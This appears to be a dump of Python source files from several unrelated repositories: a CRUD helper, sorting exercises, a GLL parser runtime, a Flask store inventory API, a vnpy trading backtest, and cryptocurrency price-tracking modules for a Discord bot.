class CRUDProtocol(CRUDBase[Protocol, ProtocolCreate, ProtocolUpdate]):
def create_with_owner(
self,
db: Session,
*,
obj_in: ProtocolCreate,
creator_id: int
) -> Protocol:
'''
Args:
db:
obj_in:
creator_id:
Returns:
'''
obj_in_data = jsonable_encoder(obj_in)
db_obj = self.model(**obj_in_data, creator_id=creator_id)
db.add(db_obj)
db.commit()
db.refresh(db_obj)
return db_obj
def get_multi_by_owner(
self,
db: Session,
*,
creator_id: int,
skip: int = 0,
limit: int = 100,
) -> List[Protocol]:
'''
Args:
db:
creator_id:
skip:
limit:
Returns:
'''
return (
db.query(self.model)
.filter(Protocol.creator_id == creator_id)
.offset(skip)
.limit(limit)
.all()
)
protocol = CRUDProtocol(Protocol)
``` |
{
"source": "0x18katyan/datastructure-algorithms",
"score": 4
} |
#### File: datastructure-algorithms/Array/merge_sorted_arrays.py
```python
def merge_sort(list1, list2):
list3 = list1 + list2
list3 = sorted(list3)
return list3
# list1 = [0, 3, 4, 31]
list1 = []
list2 = [4, 6, 30]
print(merge_sort(list1, list2))
```
#### File: datastructure-algorithms/Array/merge_sort_new.py
```python
def merge_sort(arr):
if len(arr) > 1:
mid = len(arr) // 2
L = arr[:mid]
R = arr[mid:]
merge_sort(L)
merge_sort(R)
i = j = k = 0
while i < len(L) and j < len(R):
print("arr is", arr)
print("i is {}, j is {} , k is {}".format(i, j , k))
if L[i] < R[j]:
arr[k] = L[i]
i += 1
else:
arr[k] = R[j]
j += 1
k += 1
while i < len(L):
arr[k] = L[i]
k += 1
i += 1
while j < len(R):
arr[k] = R[j]
k += 1
j += 1
arr = [123, 45, 1, 2,67, 8, 10, 1,456,234,456,9]
print("Length of original arr is", len(arr))
merge_sort(arr)
print("Length of sorted arr is", len(arr))
print("Sorted Array: ", arr)
``` |
{
"source": "0x1997/gll",
"score": 2
} |
#### File: gll/gll/runtime.py
```python
from collections import defaultdict
from gll.gss import GSSNode
from gll.sppf import DummyNode, TerminalNode
class Descriptor(object):
def __init__(self, rule_state, input_pos, gss_node, nonpacked_node):
self.state = rule_state
self.input_pos = input_pos
self.gss_node = gss_node
self.nonpacked_node = nonpacked_node
def resume(self, runtime):
self.state.resume(runtime, self)
class Runtime(object):
def __init__(self, grammar, input):
self.input = input
self.start = grammar.start
self.start_gss_node = GSSNode(grammar.start, 0)
# R: [Descriptor]
self.pending = [Descriptor(state, 0, self.start_gss_node, DummyNode())
for state in grammar.start.first_states()]
self.states = defaultdict(dict)
self.error = None
def has_next(self):
return len(self.pending) != 0
def dispatch(self):
while self.has_next():
descriptor = self.pending.pop()
descriptor.resume(self)
return self.start_gss_node.results.get(self.input.len - 1)
def record_error(self, *args):
self.error = args
def add(self, *args):
self.pending.append(Descriptor(*args))
def get_term_node(self, term_state, i, j):
term_nodes = self.states[term_state]
node = term_nodes.get(i)
if node is None:
node = term_nodes[i] = TerminalNode(term_state, i, j)
return node
def create_gss_edge(self, nonterm_state, input_pos, return_state,
target_gss_node, nonpacked_node):
gss_nodes = self.states[nonterm_state]
node = gss_nodes.get(input_pos)
if node is not None:
node.add_edge(input_pos, return_state, target_gss_node,
nonpacked_node)
return
node = gss_nodes[input_pos] = GSSNode(nonterm_state, input_pos)
node.add_edge(input_pos, return_state, target_gss_node, nonpacked_node)
for state in nonterm_state.nonterminal.look_ahead_test(input_pos):
self.pending.append(Descriptor(state, input_pos, node, DummyNode()))
``` |
{
"source": "0x1a8008/bitcoin-store",
"score": 2
} |
#### File: bitcoinstore/api/api.py
```python
from flask import Blueprint, request
from bitcoinstore.api.handlers.get_fungible \
import get_fungible as get_fungible_handler
from bitcoinstore.api.handlers.get_non_fungible \
import get_non_fungible as get_non_fungible_handler
from bitcoinstore.api.handlers.post_fungible \
import post_fungible as post_fungible_handler
from bitcoinstore.api.handlers.post_fungible_add_remove \
import post_fungible_add_remove as post_fungible_add_remove_handler
from bitcoinstore.api.handlers.put_fungible \
import put_fungible as put_fungible_handler
from bitcoinstore.api.handlers.post_fungible_reserve \
import post_fungible_reserve as post_fungible_reserve_handler
from bitcoinstore.api.handlers.put_non_fungible \
import put_non_fungible as put_non_fungible_handler
from bitcoinstore.api.handlers.put_non_fungible_reserve \
import put_non_fungible_reserve as put_non_fungible_reserve_handler
from bitcoinstore.api.handlers.delete_non_fungible_reserve \
import delete_non_fungible_reserve as delete_non_fungible_reserve_handler
api = Blueprint("api", __name__)
"""
get_fungible()
Used for retriving fungible items by sku.
"""
@api.get("/api/fungible/<string:sku>")
def get_fungible(sku):
try:
return get_fungible_handler(sku)
except Exception as e:
print(e)
return "Internal server error", 500
"""
get_non_fungible()
Used for retriving non-fungible items by sku and sn.
"""
@api.get("/api/non-fungible/<string:sku>/<string:sn>")
def get_non_fungible(sku, sn):
try:
return get_non_fungible_handler(sku, sn)
except Exception as e:
print(e)
return "Internal server error", 500
"""
post_fungible()
Used for adding fungible items without a sku.
This creates an item sku.
<body application/json> {
amount_in_stock: int | undefined
color: str | undefined
description: str | undefined
shipping_weight_grams: int | undefined
unit_price_cents: int | undefined
}
"""
@api.post("/api/fungible")
def post_fungible():
try:
properties = request.json
return post_fungible_handler(properties)
except Exception as e:
print(e)
return "Internal server error", 500
"""
post_fungible_add()
Used for adding quantity to an item by sku.
"""
@api.post("/api/fungible/<string:sku>/add/<int:quantity>")
def post_fungible_add(sku, quantity):
try:
return post_fungible_add_remove_handler(sku, quantity)
except Exception as e:
print(e)
return "Internal server error", 500
"""
post_fungible_remove()
Used for removing quantity from an item by sku.
"""
@api.post("/api/fungible/<string:sku>/remove/<int:quantity>")
def post_fungible_remove(sku, quantity):
try:
return post_fungible_add_remove_handler(sku, -quantity)
except Exception as e:
print(e)
return "Internal server error", 500
"""
post_fungible_reserve()
Used to reserve a quantity of fungible units.
"""
@api.post("/api/fungible/<string:sku>/reserve/<int:quantity>")
def post_fungible_reserve(sku, quantity) -> dict:
try:
return post_fungible_reserve_handler(sku, quantity)
except Exception as e:
print(e)
return "Internal server error", 500
"""
put_fungible()
Used for adding or updating fungible items by their sku.
If the sku exists, the item is updated else it is added.
<body application/json> {
amount_in_stock: int | undefined
color: str | undefined
description: str | undefined
shipping_weight_grams: int | undefined
unit_price_cents: int | undefined
}
"""
@api.put("/api/fungible/<string:sku>")
def put_fungible(sku) -> dict:
try:
properties = request.json
return put_fungible_handler(sku, properties)
except Exception as e:
print(e)
return "Internal server error", 500
"""
put_non_fungible()
Used for adding or updating non-fungible items by their serial number and sku.
If the serial number and sku exists, the item is updated else it is added.
<body application/json> {
color: str | undefined
description: str | undefined
notes: str | undefined
price_cents: int | undefined
shipping_weight_grams: int | undefined
sold: bool | undefined
}
"""
@api.put("/api/non-fungible/<string:sku>/<string:sn>")
def put_non_fungible(sku, sn):
try:
properties = request.json
return put_non_fungible_handler(sku, sn, properties)
except Exception as e:
print(e)
return "Internal server error", 500
"""
put_non_fungible_reserve()
Used to reserve the non-fungible item for sale.
This sets the reserved field by current datetime to later expire reservations.
"""
@api.put("/api/non-fungible/<string:sku>/<string:sn>/reservation")
def put_non_fungible_reserve(sku, sn):
try:
return put_non_fungible_reserve_handler(sku, sn)
except Exception as e:
print(e)
return "Internal server error", 500
"""
delete_non_fungible_reserve()
Used to reserve the non-fungible item for sale.
This sets the reserved field by current datetime to later expire reservations.
"""
@api.delete("/api/non-fungible/<string:sku>/<string:sn>/reservation")
def delete_non_fungible_reserve(sku, sn):
try:
return delete_non_fungible_reserve_handler(sku, sn)
except Exception as e:
print(e)
return "Internal server error", 500
```
#### File: api/handlers/put_fungible.py
```python
from bitcoinstore.extensions import db
from bitcoinstore.api.models.FungibleItem import FungibleItem
def put_fungible(sku, properties) -> dict:
try:
item = db.session.query(FungibleItem).get(sku)
if not item: # Insert new
item = FungibleItem(sku, properties)
else:
item.update(properties)
db.session.add(item)
db.session.commit()
return item.get_summary()
except Exception as e:
print(e)
return {}
```
#### File: api/handlers/put_non_fungible.py
```python
from bitcoinstore.extensions import db
from bitcoinstore.api.models.NonFungibleItem import NonFungibleItem
from bitcoinstore.api.models.NonFungibleType import NonFungibleType
def put_non_fungible(sku, sn, properties) -> dict:
try:
type = db.session.query(NonFungibleType).get(sku)
if not type: # SKU type does not exist, create one
type = NonFungibleType(sku, properties)
db.session.add(type)
else:
type.update(properties)
item = db.session.query(NonFungibleItem).get(sn)
if not item: # SN item does not exist, create one
item = NonFungibleItem(sn, properties)
item.sku = sku
else:
item.update(properties)
db.session.add(type)
db.session.add(item)
db.session.commit()
item_summary = item.get_summary()
type_summary = type.get_summary()
return {
"sn": item_summary['sn'],
"color": item_summary['color'],
"description": type_summary['description'],
"notes": item_summary['notes'],
"price_cents": item_summary['price_cents'],
"reserved": item_summary['reserved'],
"shipping_weight_grams": type_summary['shipping_weight_grams'],
"sku": item_summary['sku'],
"sold": item_summary['sold']
}
except Exception as e:
print(e)
return {}
``` |
{
"source": "0x1be20/vnpy",
"score": 2
} |
#### File: vnpy/vnpy/example.py
```python
import math
import numpy as np
import os
import sys
import csv
import datetime
import pandas as pd
from vnpy.app.cta_strategy.backtesting import BacktestingEngine, OptimizationSetting
from vnpy.app.cta_strategy.base import BacktestingMode
from vnpy.app.cta_strategy import (
CtaTemplate,
TickData,
TradeData,
OrderData,
)
feature_cols = ['custom_feature']
"""
构建自己的tick数据,这样可以通过pandas来向量化计算feature
"""
class MLTickData(TickData):
def __init__(self,**kargs):
for key in feature_cols:
setattr(self,key,kargs[key])
del(kargs[key])
TickData.__init__(self,**kargs)
class MLStrategy(CtaTemplate):
def __init__(self,cta_engine,strategy_name,vt_symbol,setting):
CtaTemplate.__init__(self,cta_engine,strategy_name,vt_symbol,setting)
self.model = setting['model']
self.features = feature_cols
def on_init(self):
print("ml strategy init")
self.load_tick(0)
def on_start(self):
print("ml strategy start")
def on_tick(self,tick:MLTickData):
feature_datas = []
for key in self.features:
feature_datas += [getattr(tick,key)]
predict = self.model.predict([feature_datas])[0]
ret = math.exp(predict)
print('predict',ret)
if self.pos>0:
if ret>1.0003:
return
elif ret>1 and ret<1.0002:
self.cancel_all()
self.sell(tick.ask_price_1,self.pos)
elif ret<0.9997:
self.cancel_all()
# cover
self.sell(tick.ask_price_1,self.pos)
# short
self.short(tick.ask_price_1,0.1)
elif self.pos<0:
if ret<0.9997:
return
elif ret>0.9997 and ret<0.9998:
self.cancel_all()
self.cover(tick.bid_price_1,abs(self.pos))
elif ret>1.0003:
self.cancel_all()
self.cover(tick.bid_price_1,abs(self.pos))
self.buy(tick.bp1,0.1)
elif self.pos==0:
if ret<0.9997:
self.short(tick.ask_price_1,0.1)
elif ret>1.0003:
self.buy(tick.bid_price_1,0.1)
def on_trade(self,trade:TradeData):
self.put_event()
# tick转换
def mapCol(item)->object:
"""
dataframe中的字段转换一下
"""
colMap = {}
for i in range(1,6):
colMap['ask_price_{}'.format(i)] = float(item["ap{}".format(i)])
colMap['ask_volume_{}'.format(i)] = float(item["aq{}".format(i)])
colMap['bid_price_{}'.format(i)] = float(item["bp{}".format(i)])
colMap['bid_volume_{}'.format(i)] = float(item["bq{}".format(i)])
return colMap
# 将feature设置到自定义tick上
def mapFeature(item)->object:
featureMap = {}
for key in feature_cols:
featureMap[key] = item[key]
return featureMap
data = testData.apply(lambda item:MLTickData(
symbol="BTC",
exchange=Exchange.BINANCE,
datetime=item.timestamp,
**mapFeature(item),
**mapCol(item),
),axis=1)
engine = BacktestingEngine()
engine.set_parameters(
vt_symbol="BTC.BINANCE",
interval="1m",
start=datetime(2020,5,19),
end=datetime(2021,5,22),
rate=0,
slippage=0,
size=.1,
pricetick=5,
capital=100000,
mode=BacktestingMode.TICK,
inverse=True,
)
engine.add_strategy(MLStrategy,setting={"model":model})
# engine.load_data()
# 设置历史数据
engine.history_data = data
engine.run_backtesting()
# 显示逐笔统计数据
engine.exhaust_trade_result(engine.trades)
``` |
{
"source": "0x1d00ffff/0xbtc-discord-price-bot",
"score": 2
} |
#### File: 0xbtc-discord-price-bot/exchanges/coinmarketcap.py
```python
from .base_exchange import BaseExchangeAPI
from secret_info import COINMARKETCAP_API_KEY
from async_url_helpers import get_json_from_url
class CoinMarketCapAPI(BaseExchangeAPI):
def __init__(self, currency_symbol):
super().__init__()
self._SERVER_URL = "https://pro-api.coinmarketcap.com/v1"
self.currency_symbol = currency_symbol
self.exchange_name = "Coin Market Cap"
self.command_names = ['cmc', 'coinmarketcap']
self.short_url = "https://bit.ly/1hJ8ztr"
self.last_updated_time = 0
self.update_failure_count = 0
self._skip_counter = 0
async def _update_cmc_data(self, timeout):
parameters = {
'symbol': self.currency_symbol
}
headers = {
'Accepts': 'application/json',
'X-CMC_PRO_API_KEY': COINMARKETCAP_API_KEY,
}
method = "/cryptocurrency/quotes/latest"
data = await get_json_from_url(
self._SERVER_URL + method,
parameters=parameters,
headers=headers)
# CMC-only attributes; TODO: use market_cap in !market or something
self.rank = int(data['data'][self.currency_symbol]['cmc_rank'])
self.market_cap = float(data['data'][self.currency_symbol]['quote']['USD']['market_cap'])
self.price_usd = float(data['data'][self.currency_symbol]['quote']['USD']['price'])
# hack: only pull volume data for ETH and BTC, since they are usually
# used as reference currencies only. The volume is ignored for other
# currencies, since volume in this bot is defined as a per-exchange
# volume, not an aggregate like CMC's api.
#
# this is done because otherwise, coinmarketcap would have its own volume
# for the 0xBTC pair, and the rest of this program would treat it as an
# exchange with N volume - but that volume is really just an aggregate
# of the volumes of our other tracked exchanges
if self.currency_symbol == "ETH" or self.currency_symbol == "BTC":
self.volume_usd = float(data['data'][self.currency_symbol]['quote']['USD']['volume_24h'])
self.change_24h = float(data['data'][self.currency_symbol]['quote']['USD']['percent_change_24h']) / 100.0
if self.currency_symbol == "ETH":
self.price_eth = 1
self.eth_price_usd = self.price_usd
if self.currency_symbol == "BTC":
self.price_btc = 1
self.btc_price_usd = self.price_usd
async def _update(self, timeout=10.0):
# HACK: since coinmarketcap has a much lower api limit than the other data
# sources, add a check here to only update every 10th time this function is
# called. combined with the 2m normal update rate, this should limit CMC to an
# update only every 20m.
if self._skip_counter <= 0:
await self._update_cmc_data(timeout)
self._skip_counter = 10
else:
self._skip_counter -= 1
return
if __name__ == "__main__":
eth_api = CoinMarketCapAPI('ETH')
eth_api.load_once_and_print_values()
eth_api = CoinMarketCapAPI('0xBTC')
eth_api.load_once_and_print_values()
```
#### File: 0xbtc-discord-price-bot/exchanges/forkdelta.py
```python
import logging
from web3 import Web3
import time
from .base_exchange import Daily24hChangeTrackedAPI
from .etherdelta_v2_abi import exchange_abi
from secret_info import ETHEREUM_NODE_URL
from constants import SECONDS_PER_ETH_BLOCK
from persistent_storage import Storage
ETHERDELTA_V2_ADDRESS = "0x8d12A197cB00D4747a1fe03395095ce2A5CC6819"
# etherdelta does a weird thing where it treats eth as a token at 0x0. this is a copy
ETH_AS_TOKEN_ADDRESS = "0x0000000000000000000000000000000000000000"
ETHEREUM_DECIMALS = 18
class ForkDeltaAPI(Daily24hChangeTrackedAPI):
def __init__(self, currency_symbol, persistent_storage):
super().__init__()
self.exchange_name = "ForkDelta"
self.command_names = ["fd", "fork delta"]
self.short_url = "https://bit.ly/2rqTGWB"
self.currency_symbol = currency_symbol
self._persistent_storage = persistent_storage
self._time_volume_last_updated = 0
# TODO: switch to using a global token address lookup module
if self.currency_symbol == "0xBTC":
self._token_address = "0xB6eD7644C69416d67B522e20bC294A9a9B405B31"
self._token_decimals = 8
else:
raise RuntimeError("Unknown currency_symbol {}, need to add address to forkdelta.py. Note that if you are running two forkdelta modules at once, you will need to upgrade ForkDeltaAPI to use different persistent_storage modules.".format(self.currency_symbol))
self.volume_tokens = 0
self.volume_eth = 0
self.price_eth = 0
self._w3 = Web3(Web3.HTTPProvider(ETHEREUM_NODE_URL))
self._exchange = self._w3.eth.contract(address=ETHERDELTA_V2_ADDRESS, abi=exchange_abi)
async def get_history_n_hours(self, num_hours=25, timeout=10.0):
volume_tokens = 0
volume_eth = 0
last_price = None
trade_topic = "0x6effdda786735d5033bfad5f53e5131abcced9e52be6c507b62d639685fbed6d"
withdraw_topic = "0xf341246adaac6f497bc2a656f546ab9e182111d630394f0c57c710a59a2cb567"
deposit_topic = "0xdcbc1c05240f31ff3ad067ef1ee35ce4997762752e3a095284754544f4c709d7"
cancel_topic = "0x1e0b760c386003e9cb9bcf4fcf3997886042859d9b6ed6320e804597fcdb28b0"
current_eth_block = self._w3.eth.blockNumber
for event in self._w3.eth.getLogs({
'fromBlock': current_eth_block - (int(60*60*num_hours / SECONDS_PER_ETH_BLOCK)),
'toBlock': current_eth_block - 1,
'address': self._exchange.address}):
topic0 = self._w3.toHex(event['topics'][0])
if topic0 == trade_topic:
#print('trade in tx', self._w3.toHex(event['transactionHash']))
receipt = self._w3.eth.getTransactionReceipt(event['transactionHash'])
parsed_logs = self._exchange.events.Trade().processReceipt(receipt)
correct_log = None
for log in parsed_logs:
if log.address.lower() == self._exchange.address.lower():
correct_log = log
if correct_log is None:
logging.warning('bad trade transaction {}'.format(self._w3.toHex(event['transactionHash'])))
continue
tokenGet = correct_log.args.tokenGet
amountGet = correct_log.args.amountGet
tokenGive = correct_log.args.tokenGive
amountGive = correct_log.args.amountGive
get = correct_log.args.get
give = correct_log.args.give # this is msg.sender from contract perspective
block_number = correct_log.blockNumber
if tokenGive.lower() == self._token_address.lower():
token_amount = amountGive / 10**self._token_decimals
eth_amount = amountGet / 10**ETHEREUM_DECIMALS
elif tokenGet.lower() == self._token_address.lower():
token_amount = amountGet / 10**self._token_decimals
eth_amount = amountGive / 10**ETHEREUM_DECIMALS
else:
# trade doesn't include token we are interested in, so skip
continue
volume_tokens += token_amount
volume_eth += eth_amount
last_price = eth_amount / token_amount
#print('{} tokens and {} eth - last_price {}'.format(token_amount, eth_amount, last_price))
elif topic0 == withdraw_topic:
#print('withdraw in tx', self._w3.toHex(event['transactionHash']))
continue
elif topic0 == deposit_topic:
#print('deposit in tx', self._w3.toHex(event['transactionHash']))
continue
elif topic0 == cancel_topic:
#print('cancel in tx', self._w3.toHex(event['transactionHash']))
continue
else:
logging.debug('unknown topic txhash {}'.format(self._w3.toHex(event['transactionHash'])))
logging.debug('unknown topic topic0 {}'.format(topic0))
return volume_tokens, volume_eth, last_price
async def _update(self, timeout=10.0):
# update day's volume only once every hour since it loads eth api
if time.time() - self._time_volume_last_updated > 60*60:
volume_tokens, volume_eth, last_price = await self.get_history_n_hours(num_hours=24, timeout=timeout)
self.volume_tokens = volume_tokens
self.volume_eth = volume_eth
self._time_volume_last_updated = time.time()
else:
# on other updates, simply check the last 10 mins for price changes
_, _, last_price = await self.get_history_n_hours(num_hours=10.0/60.0, timeout=timeout)
pass
# Forkdelta is difficult to handle; there is no price available from the contract.
# Instead you must remember the price of the last trade. Of course there are
# better and more complicated ways to consider price (order book for example) but
# this tracker does not aim to be complicated.
if last_price is None:
last_price = self._persistent_storage.last_forkdelta_price.get()
else:
self._persistent_storage.last_forkdelta_price.set(last_price)
self.price_eth = last_price
if __name__ == "__main__":
storage = Storage('./test_data/databases/')
oxbtc_api = ForkDeltaAPI("0xBTC", storage)
oxbtc_api.load_once_and_print_values()
# dai_api = ForkDeltaAPI("OMG")
# dai_api.load_once_and_print_values()
```
#### File: 0xbtc-discord-price-bot/exchanges/quickswap.py
```python
import logging
from web3 import Web3
import time
import requests
from .base_exchange import Daily24hChangeTrackedAPI, NoLiquidityException
from .uniswap_v2_abi import exchange_abi
from .uniswap_v2_router_abi import router_abi
from secret_info import MATIC_NODE_URL
from constants import SECONDS_PER_MATIC_BLOCK
from token_class import MaticToken, NoTokenMatchError
from weighted_average import WeightedAverage
# list of exchange contract addresses. each pair has a unique address.
# token0 name, token1 name, uniswap exchange address
exchanges = (
# WETH pairs
("USDC", "WETH", "0x853Ee4b2A13f8a742d64C8F088bE7bA2131f670d"),
("WETH", "DAI", "0x4A35582a710E1F4b2030A3F826DA20BfB6703C09"),
("WETH", "USDT", "0xF6422B997c7F54D1c6a6e103bcb1499EeA0a7046"),
("WMATIC", "WETH", "0xadbF1854e5883eB8aa7BAf50705338739e558E5b"),
("maWETH", "WETH", "0x587381961298A6019926329468f2dB73C414cf68"),
("WETH", "SWAM", "0xe3aD20db6f1B061024F4dF761DEB80bCd3e3E2a7"),
# 0xBTC pairs
#("maWETH", "0xBTC", "0x83Eaa0dD0146fb2494eDb1b260eC7C830d356AF7"), # removed 5/26/21; no liquidity
("WMATIC", "0xBTC", "0x74FE2ea44ACe1AEee9937A2FDc7554CFC9288964"),
("0xBTC", "WETH", "0x58BBC687Ad7113e46D35314776FAd9c4B73e200C"),
#("USDC", "0xBTC", "0x19FcFD016a5Fa35286C1FBb3F96Fe9b3fF44530e"), # removed 5/26/21; no liquidity
#("0xBTC", "USDT", "0xa3F3b3ad33C233633242bd1236072355a8af6f52"), # removed 5/26/21; no liquidity
#("KIWI", "0xBTC", "0xf115308E8347E816D23566EAafB4C0BCb1349432"), # removed 5/26/21; no liquidity
#("0xBTC", "DAI", "0xc5e5208A9544Bd0589063D4670E9747535127E16"), # removed 5/26/21; no liquidity
# KIWI pairs
("KIWI", "SWAM", "0x0cD19Fb530D0ff9caB6F233d61dE6240E7f4660F"),
("WMATIC", "KIWI", "0xb97759d3b6210F2b7Af081E023Db972856523A5a"),
("KIWI", "SWAM", "0x6233132c03DAC2Af6495A9dAB02DF18b2A9DA892"),
)
_TIME_BETWEEN_VOLUME_UPDATES = 60 * 60 # 1 hour
# if less than this many tokens in pair, don't use it for price
_MINIMUM_ALLOWED_LIQUIDITY_IN_TOKENS = 0.1
# if less than this many tokens in pair, don't check its volume
_MINIMUM_ALLOWED_LIQUIDITY_TOKENS_TO_CHECK_VOLUME = 10
class PairNotDefinedError(Exception):
pass
def getExchangeAddressesForToken(name):
return [i[2] for i in exchanges if i[0].lower() == name.lower() or i[1].lower() == name.lower()]
def getTokensFromExchangeAddress(exchange_address):
return [(i[0], i[1]) for i in exchanges if i[2].lower() == exchange_address.lower()][0]
def getExchangeAddressForTokenPair(first_token_name, second_token_name):
token_addresses = sorted([MaticToken().from_symbol(first_token_name).address.lower(),
MaticToken().from_symbol(second_token_name).address.lower()])
for token1_name, token2_name, address in exchanges:
if (token1_name in [first_token_name, second_token_name]
and token2_name in [first_token_name, second_token_name]):
return (address,
MaticToken().from_address(token_addresses[0]).symbol,
MaticToken().from_address(token_addresses[1]).symbol)
raise PairNotDefinedError(f"No pair {first_token_name}-{second_token_name} found")
def wei_to_ether(amount_in_wei):
return int(amount_in_wei) / 1000000000000000000.0
def ether_to_wei(amount_in_ether):
return int(amount_in_ether * 1000000000000000000.0)
# HACK
# python implementation of uniswap router contract's getAmountOut function. Once web3.py
# supports solidity >= 0.6, we should be able to use the real getAmountOut function.
#
# function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) internal pure returns (uint amountOut) {
# require(amountIn > 0, 'UniswapV2Library: INSUFFICIENT_INPUT_AMOUNT');
# require(reserveIn > 0 && reserveOut > 0, 'UniswapV2Library: INSUFFICIENT_LIQUIDITY');
# uint amountInWithFee = amountIn.mul(997);
# uint numerator = amountInWithFee.mul(reserveOut);
# uint denominator = reserveIn.mul(1000).add(amountInWithFee);
# amountOut = numerator / denominator;
# }
def get_amount_out__uniswap_router(amountIn, reserveIn, reserveOut):
amountIn = int(amountIn)
reserveIn = int(reserveIn)
reserveOut = int(reserveOut)
if amountIn <= 0 or reserveIn <= 0 or reserveOut <= 0:
return None
amountInWithFee = amountIn * 997
numerator = amountInWithFee * reserveOut
denominator = (reserveIn * 1000) + amountInWithFee
return numerator / denominator
def get_swap_amount(web3, amount, token0_name, token1_name):
"""Returns the number of token1 tokens you can buy for a given number of
token0 tokens"""
exchange_address, first_token_name, second_token_name = getExchangeAddressForTokenPair(token0_name, token1_name)
exchange = web3.eth.contract(address=exchange_address, abi=exchange_abi)
reserves = exchange.functions.getReserves().call()
if token0_name == second_token_name:
reserves[0], reserves[1] = reserves[1], reserves[0]
if reserves[0] == 0 or reserves[1] == 0:
return 0
# TODO: replace this with the real function (commented below) once web3.py
# supports solidity >= 0.6
amount_out = get_amount_out__uniswap_router(
amount * 10**MaticToken().from_symbol(token0_name).decimals,
reserves[0],
reserves[1])
# amount_out = self._router.functions.getAmountOut(
# amount * 10**token0_decimals,
# reserves[0],
# reserves[1]).call()
return amount_out / 10**MaticToken().from_symbol(token1_name).decimals
def get_pooled_balance_for_address(web3, token0_name, token1_name, owner_address):
"""get the balance of a particular address in a uniswap v2 pool"""
exchange_address, _, _ = getExchangeAddressForTokenPair(token0_name, token1_name)
exchange = web3.eth.contract(address=exchange_address, abi=exchange_abi)
all_ownership_tokens = exchange.functions.totalSupply().call()
if all_ownership_tokens == 0:
ownership_tokens_in_address = exchange.functions.balanceOf(owner_address).call()
ownership_percentage = ownership_tokens_in_address / all_ownership_tokens
else:
ownership_tokens_in_address = 0
ownership_percentage = 0
reserves = get_reserves(web3, token0_name, token1_name)
return reserves[0] * ownership_percentage, reserves[1] * ownership_percentage
def get_reserves(web3, token0_name, token1_name):
"""get the reserves, in tokens, of a particular uniswap v2 pool"""
exchange_address, first_token_name, second_token_name = getExchangeAddressForTokenPair(token0_name, token1_name)
exchange = web3.eth.contract(address=exchange_address, abi=exchange_abi)
reserves = exchange.functions.getReserves().call()
reserves[0] = reserves[0] / 10**MaticToken().from_symbol(first_token_name).decimals
reserves[1] = reserves[1] / 10**MaticToken().from_symbol(second_token_name).decimals
if token0_name == second_token_name:
reserves[0], reserves[1] = reserves[1], reserves[0]
return reserves[0], reserves[1]
def get_price(web3, token0_name, token1_name):
"""Get the price at a particular uniswap v2 pool, in terms of token0 / token1"""
reserves = get_reserves(web3, token0_name, token1_name)
if reserves[1] == 0:
return 0
else:
return reserves[0] / reserves[1]
class QuickSwapAPI(Daily24hChangeTrackedAPI):
def __init__(self, currency_symbol, timeout=10.0):
super().__init__()
try:
self._exchange_addresses = getExchangeAddressesForToken(currency_symbol)
self._decimals = MaticToken().from_symbol(currency_symbol).decimals
except IndexError:
raise RuntimeError("Unknown currency_symbol {}, need to add address to token_class.py".format(currency_symbol))
self.currency_symbol = currency_symbol
self.exchange_name = "QuickSwap"
self.command_names = ["quickswap"]
self.short_url = "https://bit.ly/2R42MbO" # main quickswap pre-selected to 0xbtc
self.volume_eth = 0
self._time_volume_last_updated = 0
self._w3 = Web3(Web3.HTTPProvider(MATIC_NODE_URL, request_kwargs={'timeout': timeout}))
self._exchanges = [self._w3.eth.contract(address=a, abi=exchange_abi) for a in self._exchange_addresses]
def _is_time_to_update_volume(self):
return time.time() - self._time_volume_last_updated > _TIME_BETWEEN_VOLUME_UPDATES
def _mark_volume_as_updated(self):
self._time_volume_last_updated = time.time()
async def _get_volume_at_exchange_contract(self, exchange_contract, current_eth_block=None, timeout=10.0):
volume_tokens = 0 # volume in units of <self.currency_symbol> tokens
volume_pair = 0 # volume in units of the paired token
swap_topic = "0xd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d822"
sync_topic = "0x1c411e9a96e071241c2f21f7726b17ae89e3cab4c78be50e062b03a9fffbbad1"
burn_topic = "0xdccd412f0b1252819cb1fd330b93224ca42612892bb3f4f789976e6d81936496"
transfer_topic = "0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef"
approval_topic = "0x8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925"
mint_topic = "0x4c209b5fc8ad50758f13e2e1088ba56a560dff690a1c6fef26394f4c03821c4f"
token0_address = exchange_contract.functions.token0().call()
token1_address = exchange_contract.functions.token1().call()
if current_eth_block is None:
current_eth_block = self._w3.eth.blockNumber
for event in self._w3.eth.getLogs({
'fromBlock': current_eth_block - (int(60*60*24 / SECONDS_PER_MATIC_BLOCK)),
'toBlock': current_eth_block - 1,
'address': exchange_contract.address}):
topic0 = self._w3.toHex(event['topics'][0])
if topic0 == swap_topic:
#print('swap in tx', self._w3.toHex(event['transactionHash']))
receipt = self._w3.eth.getTransactionReceipt(event['transactionHash'])
parsed_logs = exchange_contract.events.Swap().processReceipt(receipt)
correct_log = None
for log in parsed_logs:
if log.address.lower() == exchange_contract.address.lower():
correct_log = log
if correct_log is None:
logging.warning('bad swap transaction {}'.format(self._w3.toHex(event['transactionHash'])))
continue
#sender_address = correct_log.args.sender
#to_address = correct_log.args.to
amount0In = correct_log.args.amount0In
amount1In = correct_log.args.amount1In
amount0Out = correct_log.args.amount0Out
amount1Out = correct_log.args.amount1Out
#block_number = correct_log.blockNumber
if MaticToken().from_address(token0_address).symbol.lower() == self.currency_symbol.lower():
# token0 is the tracked currency symbol
volume_tokens += abs((amount0In - amount0Out) / 10**MaticToken().from_address(token0_address).decimals)
volume_pair += abs((amount1In - amount1Out) / 10**MaticToken().from_address(token1_address).decimals)
elif MaticToken().from_address(token1_address).symbol.lower() == self.currency_symbol.lower():
# token1 is the tracked currency symbol
volume_tokens += abs((amount1In - amount1Out) / 10**MaticToken().from_address(token1_address).decimals)
volume_pair += abs((amount0In - amount0Out) / 10**MaticToken().from_address(token0_address).decimals)
# print(' token', getTokenNameFromAddress(token0_address), 'send to exchange', (amount0In - amount0Out) / 10**getTokenDecimalsFromAddress(token0_address), getTokenNameFromAddress(token0_address))
# print(' token', getTokenNameFromAddress(token1_address), 'send to exchange', (amount1In - amount1Out) / 10**getTokenDecimalsFromAddress(token1_address), getTokenNameFromAddress(token1_address))
continue
elif topic0 == mint_topic:
# skip liquidity deposits/withdrawals
continue
elif topic0 == sync_topic:
continue
elif topic0 == burn_topic:
continue
elif topic0 == transfer_topic:
continue
elif topic0 == approval_topic:
continue
else:
logging.debug('unknown topic txhash {}'.format(self._w3.toHex(event['transactionHash'])))
